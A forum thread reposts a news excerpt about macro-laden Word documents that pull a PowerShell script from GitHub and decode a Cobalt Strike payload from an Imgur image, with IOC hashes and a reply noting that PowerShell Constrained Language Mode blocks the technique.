GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic

[silversurfer]

Content source

https://www.bleepingcomputer.com/news/security/github-hosted-malware-calculates-cobalt-strike-payload-from-imgur-pic/

A new strand of malware uses Word files with macros to download a PowerShell script from GitHub.
This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script on Windows systems.

This week researcher Arkbird has shared details on a new macro-based malware that is evasive and spawns payload in multifaceted steps.
The malware strand which looks "like MuddyWater," according to the researcher, ships as an embedded macro within a legacy Microsoft Word (*.doc) file, in the style of the APT group. [...]

Security researcher Florian Roth from Nextron Systems has additionally added the Indicators of Compromise (IOCs) associated with this malware to MuddyWater IOCs list, and provided YARA rules that can be used to detect the variant in your environment.
The IOCs associated with the macro-laden Word documents used in this campaign are given below:

1. d1c7a7511bd09b53c651f8ccc43e9c36ba80265ba11164f88d6863f0832d8f81
2. ed93ce9f84dbea3c070b8e03b82b95eb0944c44c6444d967820a890e8218b866

GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic

A new strand of malware uses Word files with macros to download a PowerShell script from GitHub. This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script.

www.bleepingcomputer.com

 

[Andy Ful]

This PowerShell script is also completely dismantled by PowerShell Constrained Language Mode. The Add-Type and New-Object are restricted, so System.Drawing.Bitmap, Net.WebClient, and System.Text.Encoding will fail.